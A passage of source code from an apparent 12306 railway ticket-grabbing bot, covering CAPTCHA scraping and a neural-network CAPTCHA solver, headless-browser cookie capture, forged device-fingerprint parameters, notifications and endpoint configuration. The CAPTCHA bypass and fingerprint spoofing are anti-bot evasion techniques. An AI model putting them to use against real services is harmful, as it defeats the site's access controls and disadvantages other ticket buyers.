]) model.compile(optimizer=optimizers.RMSprop(lr=1e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() reduce_lr = ReduceLROnPlateau(verbose=1) model.fit_generator(train_generator, epochs=400, steps_per_epoch=100, validation_data=(test_x[:800], test_y[:800]), callbacks=[reduce_lr]) result = model.evaluate(test_x, test_y) print(result) model.save('12306.image.model.h5', include_optimizer=False) def predict(imgs): imgs = preprocess_input(imgs) model = models.load_model('12306.image.model.h5') labels = model.predict(imgs) return labels def _predict(fn): imgs = cv2.imread(fn) imgs = cv2.resize(imgs, (67, 67)) imgs.shape = (-1, 67, 67, 3) labels = predict(imgs) print(labels.max(axis=1)) print(labels.argmax(axis=1)) if __name__ == '__main__': if len(sys.argv) >= 2: _predict(sys.argv[1]) else: learn() File: verify/pretreatment.py #! env python # coding: utf-8 # 功能:对图像进行预处理,将文字部分单独提取出来 # 并存放到ocr目录下 # 文件名为原验证码文件的文件名 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import hashlib import os import pathlib import cv2 import numpy as np import requests import scipy.fftpack PATH = 'imgs' def download_image(): # 抓取验证码 # 存放到指定path下 # 文件名为图像的MD5 url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand' r = requests.get(url) fn = hashlib.md5(r.content).hexdigest() with open(f'{PATH}/{fn}.jpg', 'wb') as fp: fp.write(r.content) def download_images(): pathlib.Path(PATH).mkdir(exist_ok=True) for idx in range(40000): download_image() print(idx) def get_text(img, offset=0): # 得到图像中的文本部分 return img[3:22, 120 + offset:177 + offset] def avhash(im): im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC) avg = im.mean() im = im > avg im = np.packbits(im) return im def phash(im): im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC) im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1) im = im[:8, :8] med = np.median(im) im = im > med im = np.packbits(im) return im def _get_imgs(img): interval = 5 length = 67 for x in range(40, img.shape[0] - length, interval + length): for y in range(interval, img.shape[1] - length, interval + length): yield img[x:x + length, y:y + length] def get_imgs(img): imgs = [] for img in _get_imgs(img): imgs.append(phash(img)) return imgs def pretreat(): if not os.path.isdir(PATH): download_images() texts, imgs = [], [] for img in os.listdir(PATH): img = os.path.join(PATH, img) img = cv2.imread(img, cv2.IMREAD_GRAYSCALE) texts.append(get_text(img)) imgs.append(get_imgs(img)) return texts, imgs def load_data(path='data.npz'): if not os.path.isfile(path): texts, imgs = pretreat() np.savez(path, texts=texts, images=imgs) f = np.load(path) return f['texts'], f['images'] if __name__ == '__main__': texts, imgs = load_data() print(texts.shape) print(imgs.shape) imgs = imgs.reshape(-1, 8) print(np.unique(imgs, axis=0).shape) File: verify/__init__.py File: verify/localVerifyCode.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import base64 import os import cv2 import numpy as np from keras import models, backend import tensorflow as tf from verify import pretreatment from verify.mlearn_for_image import preprocess_input graph = tf.get_default_graph() PATH = lambda p: os.path.abspath( os.path.join(os.path.dirname(__file__), p) ) TEXT_MODEL = "" IMG_MODEL = "" def get_text(img, offset=0): text = pretreatment.get_text(img, offset) text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY) text = text / 255.0 h, w = text.shape text.shape = (1, h, w, 1) return text def base64_to_image(base64_code): # base64解码 img_data = base64.b64decode(base64_code) # 转换为np数组 img_array = np.fromstring(img_data, np.uint8) # 转换成opencv可用格式 img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR) return img class Verify: def __init__(self): self.textModel = "" self.imgModel = "" self.loadImgModel() self.loadTextModel() def loadTextModel(self): if not self.textModel: self.textModel = models.load_model(PATH('../model.v2.0.h5')) else: print("无需加载模型model.v2.0.h5") def loadImgModel(self): if not self.imgModel: self.imgModel = models.load_model(PATH('../12306.image.model.h5')) def verify(self, fn): verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺', '海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅', '电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮', '菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟', '刺绣', '铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴', '薯条', '蜜蜂', '日历', '口哨'] # 读取并预处理验证码 img = base64_to_image(fn) text = get_text(img) imgs = np.array(list(pretreatment._get_imgs(img))) imgs = preprocess_input(imgs) text_list = [] # 识别文字 self.loadTextModel() global graph with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) # 获取下一个词 # 根据第一个词的长度来定位第二个词的位置 if len(text) == 1: offset = 27 elif len(text) == 2: offset = 47 else: offset = 60 text = get_text(img, offset=offset) if text.mean() < 0.95: with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) print("题目为{}".format(text_list)) # 加载图片分类器 self.loadImgModel() with graph.as_default(): labels = self.imgModel.predict(imgs) labels = labels.argmax(axis=1) results = [] for pos, label in enumerate(labels): l = verify_titles[label] print(pos + 1, l) if l in text_list: results.append(str(pos + 1)) return results if __name__ == '__main__': pass # verify("verify-img1.jpeg") File: config/emailConf.py # -*- coding: utf8 -*- import socket __author__ = 'MR.wen' import TickerConfig from email.header import Header from email.mime.text import MIMEText import smtplib def sendEmail(msg): """ 邮件通知 :param str: email content :return: """ try: if TickerConfig.EMAIL_CONF["IS_MAIL"]: sender = TickerConfig.EMAIL_CONF["email"] receiver = TickerConfig.EMAIL_CONF["notice_email_list"] subject = '恭喜,您已订票成功' username = TickerConfig.EMAIL_CONF["username"] password = TickerConfig.EMAIL_CONF["password"] host = TickerConfig.EMAIL_CONF["host"] s = "{0}".format(msg) msg = MIMEText(s, 'plain', 'utf-8') # 中文需参数‘utf-8’,单字节字符不需要 msg['Subject'] = Header(subject, 'utf-8') msg['From'] = sender msg['To'] = receiver try: smtp = smtplib.SMTP_SSL(host) smtp.connect(host) except socket.error: smtp = smtplib.SMTP() smtp.connect(host) smtp.connect(host) smtp.login(username, password) smtp.sendmail(sender, receiver.split(","), msg.as_string()) smtp.quit() print(u"邮件已通知, 请查收") except Exception as e: print(u"邮件配置有误{}".format(e)) if __name__ == '__main__': sendEmail(1) File: config/pushbearConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_BEAR_API_PATH = "https://pushbear.ftqq.com/sub" def sendPushBear(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if TickerConfig.PUSHBEAR_CONF["is_pushbear"] and TickerConfig.PUSHBEAR_CONF["send_key"].strip() != "": try: sendPushBearUrls = urls.get("Pushbear") data = { "sendkey": TickerConfig.PUSHBEAR_CONF["send_key"].strip(), "text": "易行购票成功通知", "desp": msg } httpClint = HTTPClient(0) sendPushBeaRsp = httpClint.send(sendPushBearUrls, data=data) if sendPushBeaRsp.get("code") is 0: print(u"已下发 pushbear 微信通知, 请查收") else: print(sendPushBeaRsp) except Exception as e: print(u"pushbear 配置有误 {}".format(e)) else: pass if __name__ == '__main__': sendPushBear(1) File: config/__init__.py File: config/logger.py #coding: utf-8 import os import time import logging from config import configCommon logger = None loggerHandler = None dateStr = '' #默认拥有日期后缀 suffix = '' #除了日期外的后缀 def setSuffix(s): global suffix suffix = s def getTodayDateStr(): return time.strftime("%Y-%m-%d", time.localtime(configCommon.getNowTimestamp())) def setDateStr(s): global dateStr dateStr = s def isAnotherDay(s): global dateStr return dateStr != s def getLogFile(): global dateStr, suffix rtn = os.path.join(configCommon.getLogDir(), dateStr) if suffix: rtn += "_" + suffix return rtn + ".log" def log(msg, func = "info"): global logger if not logger: logger = logging.getLogger() logger.setLevel(logging.INFO) todayStr = getTodayDateStr() if isAnotherDay(todayStr): setDateStr(todayStr) logger.removeHandler(loggerHandler) fh = logging.FileHandler(getLogFile()) fm = logging.Formatter(u'[%(asctime)s][%(levelname)8s] --- %(message)s (%(filename)s:%(lineno)s)') fh.setFormatter(fm) logger.addHandler(fh) levels = { "debug": logger.debug, "info": logger.info, "warning": logger.warning, "error": logger.error, "critical": logger.critical } levels[func](msg) File: config/configCommon.py # -*- coding: utf-8 -*- import datetime import os import random import sys import time from myException.ticketConfigException import ticketConfigException rushRefreshMinTimeIntval = 2000 rushRefreshMaxTimeIntval = 3600000 rushRefreshTimeIntval = 100 # 最早运行时间 maxRunTime = 6 # 程序停止时间 maxRunStopTime = 23 # 可售天数 maxDate = 29 RS_SUC = 0 RS_TIMEOUT = 1 RS_JSON_ERROR = 2 RS_OTHER_ERROR = 3 seat_conf = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '软座': 24, '硬座': 29, '无座': 26, '动卧': 33, } if sys.version_info.major == 2: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.iteritems()]) else: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.items()]) def getNowTimestamp(): return time.time() def decMakeDir(func): def handleFunc(*args, **kwargs): dirname = func(*args, **kwargs) if not os.path.exists(dirname): os.makedirs(dirname) elif not os.path.isdir(dirname): pass return dirname return func def getWorkDir(): return os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # # def fileOpen(path): # """ # 文件读取兼容2和3 # :param path: 文件读取路径 # :return: # """ # try: # with open(path, "r", ) as f: # return f # except TypeError: # with open(path, "r", ) as f: # return f @decMakeDir def getTmpDir(): return os.path.join(getWorkDir(), "tmp") @decMakeDir def getLogDir(): return os.path.join(getTmpDir(), "log") @decMakeDir def getCacheDir(): return os.path.join(getTmpDir(), "cache") @decMakeDir def getVCodeDir(): return os.path.join(getTmpDir(), "vcode") def getVCodeImageFile(imageName): return os.path.join(getVCodeDir(), imageName + ".jpg") def getCacheFile(cacheType): return os.path.join(getCacheDir(), cacheType + ".cache") def checkSleepTime(session): now = datetime.datetime.now() if now.hour >= maxRunStopTime or now.hour < maxRunTime: print(u"12306休息时间,本程序自动停止,明天早上六点将自动运行") open_time = datetime.datetime(now.year, now.month, now.day, maxRunTime) if open_time < now: open_time += datetime.timedelta(1) time.sleep((open_time - now).seconds + round(random.uniform(1, 10))) session.call_login() def checkDate(station_dates): """ 检查日期是否合法 :param station_dates: :return: """ today = datetime.datetime.now() maxDay = (today + datetime.timedelta(maxDate)).strftime("%Y-%m-%d") for station_date in station_dates[::-1]: date = datetime.datetime.strftime(datetime.datetime.strptime(station_date, "%Y-%m-%d"), "%Y-%m-%d") if date < today.strftime("%Y-%m-%d") or date > maxDay: print(u"警告:当前时间配置有小于当前时间或者大于最大时间: {}, 已自动忽略".format(station_date)) station_dates.remove(station_date) if not station_dates: print(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") raise ticketConfigException(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") else: station_dates[station_dates.index(station_date)] = date return station_dates File: config/AutoSynchroTime.py # coding=utf-8 import os import platform import ntplib import datetime def autoSynchroTime(): """ 同步北京时间,执行时候,请务必用sudo,sudo,sudo 执行,否则会报权限错误,windows打开ide或者cmd请用管理员身份 :return: """ c = ntplib.NTPClient() hosts = ['ntp1.aliyun.com', 'ntp2.aliyun.com', 'ntp3.aliyun.com', 'ntp4.aliyun.com', 'cn.pool.ntp.org'] print(u"正在同步时间,请耐心等待30秒左右,如果下面有错误发送,可以忽略!!") print(u"系统当前时间{}".format(str(datetime.datetime.now())[:22])) system = platform.system() if system == "Windows": # windows 同步时间未测试过,参考地址:https://www.jianshu.com/p/92ec15da6cc3 for host in hosts: os.popen('w32tm /register') os.popen('net start w32time') os.popen('w32tm /config /manualpeerlist:"{}" /syncfromflags:manual /reliable:yes /update'.format(host)) os.popen('ping -n 3 127.0.0.1 >nul') sin = os.popen('w32tm /resync') if sin is 0: break else: # mac同步地址,如果ntpdate未安装,brew install ntpdate linux 安装 yum install -y ntpdate for host in hosts: sin = os.popen('ntpdate {}'.format(host)) if sin is 0: break print(u"同步后时间:{}".format(str(datetime.datetime.now())[:22])) if __name__ == '__main__': autoSynchroTime() File: config/getCookie.py import json import random import re import time import os import TickerConfig from config.urlConf import urls def getDrvicesID(session): """ :return: """ print("cookie获取中") if TickerConfig.COOKIE_TYPE is 1: from selenium import webdriver cookies = [] # 解决放镜像里 DevToolsActivePort file doesn't exist的问题 options = webdriver.ChromeOptions() if os.name != 'nt' and TickerConfig.CHROME_CHROME_PATH: options = webdriver.ChromeOptions() options.binary_location = TickerConfig.CHROME_CHROME_PATH options.add_argument( '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36') options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome(executable_path=TickerConfig.CHROME_PATH,chrome_options=options) driver.get("https://www.12306.cn/index/index.html") time.sleep(10) for c in driver.get_cookies(): cookie = dict() print() if c.get("name") == "RAIL_DEVICEID" or c.get("name") == "RAIL_EXPIRATION": cookie[c.get("name")] = c.get("value") cookies.append(cookie) print(f"获取cookie: {cookies}") if cookies: session.httpClint.set_cookies(cookies) session.cookies = cookies print("cookie获取完成") elif TickerConfig.COOKIE_TYPE is 2: request_device_id(session) elif TickerConfig.COOKIE_TYPE is 3: # RAIL_DEVICEID,RAIL_EXPIRATION的值打开12306官网可以获取headers-Cookies if not TickerConfig.RAIL_DEVICEID or not TickerConfig.RAIL_EXPIRATION: print("警告!!: RAIL_DEVICEID,RAIL_EXPIRATION的值为空,请手动打开12306官网可以获取headers-Cookies中的RAIL_DEVICEID,RAIL_EXPIRATION,填入配置文件中") cookies = [{ "RAIL_DEVICEID": TickerConfig.RAIL_DEVICEID, "RAIL_EXPIRATION": TickerConfig.RAIL_EXPIRATION, }] session.httpClint.set_cookies(cookies) session.cookies = cookies def request_device_id(session): """ 获取加密后的浏览器特征 ID :return: """ params = {"algID": request_alg_id(session), "timestamp": int(time.time() * 1000)} params = dict(params, **_get_hash_code_params()) response = session.httpClint.send(urls.get("getDevicesId"), params=params) if response.find('callbackFunction') >= 0: result = response[18:-2] try: result = json.loads(result) session.httpClint.set_cookies([{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }]) session.cookies = [{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }] except: return False def request_alg_id(session): response = session.httpClint.send(urls.get("GetJS")) result = re.search(r'algID\\x3d(.*?)\\x26', response) try: return result.group(1) except (IndexError, AttributeError) as e: pass return "" def _get_hash_code_params(): from collections import OrderedDict data = { 'adblock': '0', 'browserLanguage': 'en-US', 'cookieEnabled': '1', 'custID': '133', 'doNotTrack': 'unknown', 'flashVersion': '0', 'javaEnabled': '0', 'jsFonts': 'c227b88b01f5c513710d4b9f16a5ce52', 'localCode': '3232236206', 'mimeTypes': '52d67b2a5aa5e031084733d5006cc664', 'os': 'MacIntel', 'platform': 'WEB', 'plugins': 'd22ca0b81584fbea62237b14bd04c866', 'scrAvailSize': str(random.randint(500, 1000)) + 'x1920', 'srcScreenSize': '24xx1080x1920', 'storeDb': 'i1l1o1s1', 'timeZone': '-8', 'touchSupport': '99115dfb07133750ba677d055874de87', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( random.randint( 5000, 7000)) + '.0 Safari/537.36', 'webSmartID': 'f4e3b7b14cc647e30a6267028ad54c56', } data_trans = { 'browserVersion': 'd435', 'touchSupport': 'wNLf', 'systemLanguage': 'e6OK', 'scrWidth': 'ssI5', 'openDatabase': 'V8vl', 'scrAvailSize': 'TeRS', 'hasLiedResolution': '3neK', 'hasLiedOs': 'ci5c', 'timeZone': 'q5aJ', 'userAgent': '0aew', 'userLanguage': 'hLzX', 'jsFonts': 'EOQP', 'scrAvailHeight': '88tV', 'browserName': '-UVA', 'cookieCode': 'VySQ', 'online': '9vyE', 'scrAvailWidth': 'E-lJ', 'flashVersion': 'dzuS', 'scrDeviceXDPI': '3jCe', 'srcScreenSize': 'tOHY', 'storeDb': 'Fvje', 'doNotTrack': 'VEek', 'mimeTypes': 'jp76', 'sessionStorage': 'HVia', 'cookieEnabled': 'VPIf', 'os': 'hAqN', 'hasLiedLanguages': 'j5po', 'hasLiedBrowser': '2xC5', 'webSmartID': 'E3gR', 'appcodeName': 'qT7b', 'javaEnabled': 'yD16', 'plugins': 'ks0Q', 'appMinorVersion': 'qBVW', 'cpuClass': 'Md7A', 'indexedDb': '3sw-', 'adblock': 'FMQw', 'localCode': 'lEnu', 'browserLanguage': 'q4f3', 'scrHeight': '5Jwy', 'localStorage': 'XM7l', 'historyList': 'kU5z', 'scrColorDepth': "qmyu" } data = OrderedDict(data) d = '' params = {} for key, item in data.items(): d += key + item key = data_trans[key] if key in data_trans else key params[key] = item d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[d_f:2 * d_f] + d[2 * d_f:d_len] + d[0: d_f] d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[2 * d_f:d_len] + d[0: d_f] + d[1 * d_f: 2 * d_f] d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) data_str = _encode_string(d) params['hashCode'] = data_str return params def _encode_data_str_v2(d): b = len(d) if b % 2 == 0: return d[b // 2: b] + d[0:b // 2] else: return d[b // 2 + 1:b] + d[b // 2] + d[0:b // 2] def _encode_string(str): import hashlib import base64 result = base64.b64encode(hashlib.sha256(str.encode()).digest()).decode() return result.replace('+', '-').replace('/', '_').replace('=', '') File: config/TicketEnmu.py # coding=utf-8 from enum import Enum class ticket(object): QUERY_C = u"查询到有余票,尝试提交订单" QUERY_IN_BLACK_LIST = u"该车次{} 正在被关小黑屋,跳过此车次" SUCCESS_CODE = 000000 FAIL_CODE = 999999 AUTO_SUBMIT_ORDER_REQUEST_C = u"提交订单成功" AUTO_SUBMIT_ORDER_REQUEST_F = u"提交订单失败,重新刷票中" AUTO_SUBMIT_NEED_CODE = u"需要验证码" AUTO_SUBMIT_NOT_NEED_CODE = u"不需要验证码" TICKET_BLACK_LIST_TIME = 5 # 加入小黑屋的等待时间,默认5 min DTO_NOT_FOUND = u"未查找到常用联系人, 请查证后添加!!" DTO_NOT_IN_LIST = u"联系人不在列表中,请查证后添加!!" QUEUE_TICKET_SHORT = u"当前余票数小于乘车人数,放弃订票" QUEUE_TICKET_SUCCESS = u"排队成功, 当前余票还剩余: {0}张" QUEUE_JOIN_BLACK = u"排队发现未知错误{0},将此列车 {1}加入小黑屋" QUEUE_WARNING_MSG = u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋" OUT_NUM = 120 # 排队请求12306的次数 WAIT_OUT_NUM = u"超出排队时间,自动放弃,正在重新刷票" WAIT_ORDER_SUCCESS = u"恭喜您订票成功,订单号为:{0}, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付!" WAIT_AFTER_NATE_SUCCESS = u"候补订单已完成,请立即打开浏览器登录12306,访问‘候补订单’,在30分钟内完成支付!" WAIT_ORDER_CONTINUE = u"排队等待时间预计还剩 {0} ms" WAIT_ORDER_FAIL = u"排队等待失败,错误消息:{0}" WAIT_ORDER_NUM = u"第{0}次排队中,请耐心等待" WAIT_ORDER_SUB_FAIL = u"订单提交失败!,正在重新刷票" CANCEL_ORDER_SUCCESS = u"排队超时,已为您自动取消订单,订单编号: {0}" CANCEL_ORDER_FAIL = u"排队超时,取消订单失败, 订单号{0}" REST_TIME = u"12306休息时间,本程序自动停止,明天早上6点将自动运行" REST_TIME_PAST = u"休息时间已过,重新开启检票功能" LOGIN_SESSION_FAIL = u"用户检查失败:{0},可能未登录,可能session已经失效, 正在重新登录中" File: config/serverchanConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_SERVER_CHAN_PATH = "https://sc.ftqq.com" def sendServerChan(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if ( TickerConfig.SERVER_CHAN_CONF["is_server_chan"] and TickerConfig.SERVER_CHAN_CONF["secret"].strip() != "" ): try: secret = TickerConfig.SERVER_CHAN_CONF["secret"].strip() sendServerChanUrls = urls.get("ServerChan") sendServerChanUrls["req_url"] += f'{secret}.send' params = {"text": "易行购票成功通知", "desp": msg} httpClint = HTTPClient(0) sendServerChanRsp = httpClint.send(sendServerChanUrls, params=params) if sendServerChanRsp.get("errno") == 0: print(u"已下发 Server酱 微信通知, 请查收") else: print(sendServerChanRsp) except Exception as e: print(u"Server酱 配置有误 {}".format(e)) if __name__ == "__main__": sendServerChan(1) File: config/urlConf.py # coding=utf-8 import random import TickerConfig import time urls = { "auth": { # 登录接口 "req_url": "/passport/web/auth/uamtk", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "uamtk-static": { # 登录接口 "req_url": "/passport/web/auth/uamtk-static", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 3, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "login": { # 登录接口 "req_url": "/passport/web/login", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.5, "is_logger": True, "is_cdn": True, "is_json": True, }, "left_ticket_init": { # 登录接口 "req_url": "/otn/leftTicket/init", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "getCodeImg": { # 登录验证码 "req_url": "/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&{0}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_json": False, "is_cdn": True, "not_decode": True, }, "getCodeImg1": { # 登录验证码 "req_url": "/passport/captcha/captcha-image64?login_site=E&module=login&rand=sjrand&{0}&callback=jQuery19108016482864806321_1554298927290&_=1554298927293", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck": { # 验证码校验 "req_url": "/passport/captcha/captcha-check", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck1": { # 验证码校验 "req_url": "/passport/captcha/captcha-check?callback=jQuery19108016482864806321_1554298927290&answer={0}&rand=sjrand&login_site=E&_={1}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": False, }, "loginInit": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "loginInitCdn": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": True, "is_cdn": True, "is_json": False, }, "loginInitCdn1": { # 登录页面 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/view/index.html", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": False, "is_cdn": True, "is_json": False, }, "getDevicesId": { # 获取用户信息 "req_url": "/otn/HttpZF/logdevice", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": False, }, "getUserInfo": { # 获取用户信息 "req_url": "/otn/index/initMy12306", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": False, "is_json": False, }, "userLogin": { # 用户登录 "req_url": "/otn/login/userLogin", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "uamauthclient": { # 登录 "req_url": "/otn/uamauthclient", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "initdc_url": { # 生成订单页面 "req_url": "/otn/confirmPassenger/initDc", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 1, "is_logger": False, "is_cdn": True, "is_json": False, }, "GetJS": { # 订单页面js "req_url": "/otn/HttpZF/GetJS", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "odxmfwg": { # 订单页面js "req_url": "/otn/dynamicJs/odxmfwg", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "get_passengerDTOs": { # 获取乘车人 "req_url": "/otn/confirmPassenger/getPassengerDTOs", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "select_url": { # 查询余票 "req_url": "/otn/{3}?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 0.01, "s_time": 0.01, "is_logger": False, "is_json": True, "is_cdn": True, }, "check_user_url": { # 检查用户登录 "req_url": "/otn/login/checkUser", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 1, "is_cdn": True, "is_logger": True, "is_json": True, }, "submit_station_url": { # 提交订单 "req_url": "/otn/leftTicket/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "checkOrderInfoUrl": { # 检查订单信息规范 "req_url": "/otn/confirmPassenger/checkOrderInfo", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountUrl": { # 剩余余票数 "req_url": "/otn/confirmPassenger/getQueueCount", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkQueueOrderUrl": { # 订单队列排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkRandCodeAnsyn": { # 暂时没用到 "req_url": "/otn/passcodeNew/checkRandCodeAnsyn", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "codeImgByOrder": { # 订单页面验证码 "req_url": "/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&{}", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, 